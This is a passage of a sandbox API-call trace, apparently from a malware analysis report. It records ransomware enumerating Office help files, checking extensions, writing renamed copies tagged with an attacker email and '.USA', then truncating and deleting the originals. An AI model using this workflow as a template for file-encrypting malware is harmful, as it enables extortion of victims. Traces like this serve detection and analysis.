Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs")) returned 0x20 [0272.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.882] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0272.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.882] lstrlenW (lpString=".doc") returned 4 [0272.882] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0272.882] lstrlenW (lpString=".docx") returned 5 [0272.882] lstrcmpiW (lpString1=".docx", lpString2="L.HXS") returned -1 [0272.882] lstrlenW (lpString=".pdf") returned 4 [0272.882] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0272.882] lstrlenW (lpString=".xls") returned 4 [0272.882] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0272.882] lstrlenW (lpString=".xlsx") returned 5 [0272.882] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXS") returned -1 [0272.882] lstrlenW (lpString=".ppt") returned 4 [0272.882] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0272.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.882] lstrlenW (lpString=".zip") returned 4 [0272.882] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0272.882] lstrlenW (lpString=".rar") returned 4 [0272.882] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0272.882] lstrlenW (lpString=".bz2") returned 4 [0272.882] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0272.882] lstrlenW (lpString=".7z") returned 3 [0272.882] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0272.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.882] lstrlenW (lpString=".dbf") returned 4 [0272.882] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0272.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.882] lstrlenW (lpString=".1cd") returned 4 [0272.883] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0272.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.883] lstrlenW (lpString=".jpg") returned 4 [0272.883] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0272.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.883] lstrlenW (lpString=".doc") returned 4 [0272.883] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0272.883] lstrlenW (lpString=".docx") returned 5 [0272.883] lstrcmpiW (lpString1=".docx", lpString2="L.HXS") returned -1 [0272.883] lstrlenW (lpString=".pdf") returned 4 [0272.883] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0272.883] lstrlenW (lpString=".xls") returned 4 [0272.883] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0272.883] lstrlenW (lpString=".xlsx") returned 5 [0272.883] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXS") returned -1 [0272.883] lstrlenW (lpString=".ppt") returned 4 [0272.883] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0272.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.883] lstrlenW (lpString=".zip") returned 4 [0272.883] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0272.883] lstrlenW (lpString=".rar") returned 4 [0272.883] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0272.883] lstrlenW (lpString=".bz2") returned 4 [0272.883] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0272.883] lstrlenW (lpString=".7z") returned 3 [0272.883] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0272.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.883] lstrlenW (lpString=".dbf") returned 4 [0272.883] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0272.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.883] lstrlenW (lpString=".1cd") returned 4 [0272.884] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0272.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57 [0272.884] lstrlenW (lpString=".jpg") returned 4 [0272.884] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0272.884] lstrcmpiW (lpString1=".HXC", lpString2=".USA") returned -1 [0272.884] lstrlenW (lpString="EXCEL_COL.HXC") returned 13 [0272.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.884] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=621) returned 1 [0272.884] CloseHandle (hObject=0x2bc) returned 1 [0272.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc")) returned 0x20 [0272.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.884] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.885] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.885] GetLastError () returned 0x0 [0272.885] ReadFile (in: hFile=0x2bc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x26d, lpOverlapped=0x0) returned 1 [0272.924] WriteFile (in: hFile=0x3a4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x270, lpOverlapped=0x0) returned 1 [0272.925] ReadFile (in: hFile=0x2bc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.925] WriteFile (in: hFile=0x3a4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xee, lpOverlapped=0x0) returned 1 [0272.925] SetEndOfFile (hFile=0x3a4) returned 1 [0273.076] CloseHandle (hObject=0x3a4) returned 1 [0273.076] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.076] SetEndOfFile (hFile=0x2bc) returned 1 [0273.077] CloseHandle (hObject=0x2bc) returned 1 [0273.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.092] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc")) returned 1 [0273.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.092] lstrlenW (lpString=".doc") returned 4 [0273.092] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0273.092] lstrlenW (lpString=".docx") returned 5 [0273.092] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0273.092] lstrlenW (lpString=".pdf") returned 4 [0273.092] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0273.092] lstrlenW (lpString=".xls") returned 4 [0273.092] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0273.092] lstrlenW (lpString=".xlsx") returned 5 [0273.092] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0273.092] lstrlenW (lpString=".ppt") returned 4 [0273.092] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0273.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.093] lstrlenW (lpString=".zip") returned 4 [0273.093] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0273.093] lstrlenW (lpString=".rar") returned 4 [0273.093] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0273.093] lstrlenW (lpString=".bz2") returned 4 [0273.093] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0273.093] lstrlenW (lpString=".7z") returned 3 [0273.093] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0273.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.093] lstrlenW (lpString=".dbf") returned 4 [0273.093] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0273.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.093] lstrlenW (lpString=".1cd") returned 4 [0273.093] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0273.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.093] lstrlenW (lpString=".jpg") returned 4 [0273.093] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0273.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.093] lstrlenW (lpString=".doc") returned 4 [0273.093] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0273.093] lstrlenW (lpString=".docx") returned 5 [0273.093] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0273.093] lstrlenW (lpString=".pdf") returned 4 [0273.093] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0273.093] lstrlenW (lpString=".xls") returned 4 [0273.093] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0273.093] lstrlenW (lpString=".xlsx") returned 5 [0273.093] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0273.093] lstrlenW (lpString=".ppt") returned 4 [0273.093] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0273.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.094] lstrlenW (lpString=".zip") returned 4 [0273.094] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0273.094] lstrlenW (lpString=".rar") returned 4 [0273.094] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0273.094] lstrlenW (lpString=".bz2") returned 4 [0273.094] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0273.094] lstrlenW (lpString=".7z") returned 3 [0273.094] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0273.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.094] lstrlenW (lpString=".dbf") returned 4 [0273.094] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0273.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.094] lstrlenW (lpString=".1cd") returned 4 [0273.094] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0273.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61 [0273.094] lstrlenW (lpString=".jpg") returned 4 [0273.094] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0273.094] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0273.094] lstrlenW (lpString="EXCEL_F_COL.HXK") returned 15 [0273.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.095] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=114) returned 1 [0273.095] CloseHandle (hObject=0x2b0) returned 1 [0273.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk")) returned 0x20 [0273.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.095] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.095] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.096] GetLastError () returned 0x0 [0273.096] ReadFile (in: hFile=0x2b0, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x72, lpOverlapped=0x0) returned 1 [0273.097] WriteFile (in: hFile=0x3b0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x80, lpOverlapped=0x0) returned 1 [0273.097] ReadFile (in: hFile=0x2b0, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.097] WriteFile (in: hFile=0x3b0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf2, lpOverlapped=0x0) returned 1 [0273.097] SetEndOfFile (hFile=0x3b0) returned 1 [0273.097] CloseHandle (hObject=0x3b0) returned 1 [0273.097] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.097] SetEndOfFile (hFile=0x2b0) returned 1 [0273.099] CloseHandle (hObject=0x2b0) returned 1 [0273.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.100] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_f_col.hxk")) returned 1 [0273.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.100] lstrlenW (lpString=".doc") returned 4 [0273.100] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0273.100] lstrlenW (lpString=".docx") returned 5 [0273.100] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0273.100] lstrlenW (lpString=".pdf") returned 4 [0273.100] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0273.100] lstrlenW (lpString=".xls") returned 4 [0273.100] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0273.100] lstrlenW (lpString=".xlsx") returned 5 [0273.100] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0273.100] lstrlenW (lpString=".ppt") returned 4 [0273.100] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0273.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.100] lstrlenW (lpString=".zip") returned 4 [0273.100] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0273.100] lstrlenW (lpString=".rar") returned 4 [0273.100] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0273.100] lstrlenW (lpString=".bz2") returned 4 [0273.100] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0273.100] lstrlenW (lpString=".7z") returned 3 [0273.100] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0273.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.101] lstrlenW (lpString=".dbf") returned 4 [0273.101] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0273.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.101] lstrlenW (lpString=".1cd") returned 4 [0273.101] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0273.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.101] lstrlenW (lpString=".jpg") returned 4 [0273.101] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0273.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.101] lstrlenW (lpString=".doc") returned 4 [0273.101] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0273.101] lstrlenW (lpString=".docx") returned 5 [0273.101] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0273.101] lstrlenW (lpString=".pdf") returned 4 [0273.101] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0273.101] lstrlenW (lpString=".xls") returned 4 [0273.101] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0273.101] lstrlenW (lpString=".xlsx") returned 5 [0273.101] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0273.101] lstrlenW (lpString=".ppt") returned 4 [0273.101] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0273.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.101] lstrlenW (lpString=".zip") returned 4 [0273.101] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0273.101] lstrlenW (lpString=".rar") returned 4 [0273.101] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0273.101] lstrlenW (lpString=".bz2") returned 4 [0273.101] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0273.101] lstrlenW (lpString=".7z") returned 3 [0273.102] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0273.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.102] lstrlenW (lpString=".dbf") returned 4 [0273.102] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0273.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.102] lstrlenW (lpString=".1cd") returned 4 [0273.102] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0273.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_F_COL.HXK") returned 63 [0273.102] lstrlenW (lpString=".jpg") returned 4 [0273.102] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0273.102] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0273.102] lstrlenW (lpString="EXCEL_K_COL.HXK") returned 15 [0273.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.102] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=113) returned 1 [0273.102] CloseHandle (hObject=0x2b0) returned 1 [0273.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk")) returned 0x20 [0273.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.103] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.103] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.103] GetLastError () returned 0x0 [0273.103] ReadFile (in: hFile=0x2b0, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x71, lpOverlapped=0x0) returned 1 [0273.104] WriteFile (in: hFile=0x3b0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x80, lpOverlapped=0x0) returned 1 [0273.104] ReadFile (in: hFile=0x2b0, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.104] WriteFile (in: hFile=0x3b0, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf2, lpOverlapped=0x0) returned 1 [0273.105] SetEndOfFile (hFile=0x3b0) returned 1 [0273.105] CloseHandle (hObject=0x3b0) returned 1 [0273.105] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.105] SetEndOfFile (hFile=0x2b0) returned 1 [0273.107] CloseHandle (hObject=0x2b0) returned 1 [0273.107] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.107] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_k_col.hxk")) returned 1 [0273.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.107] 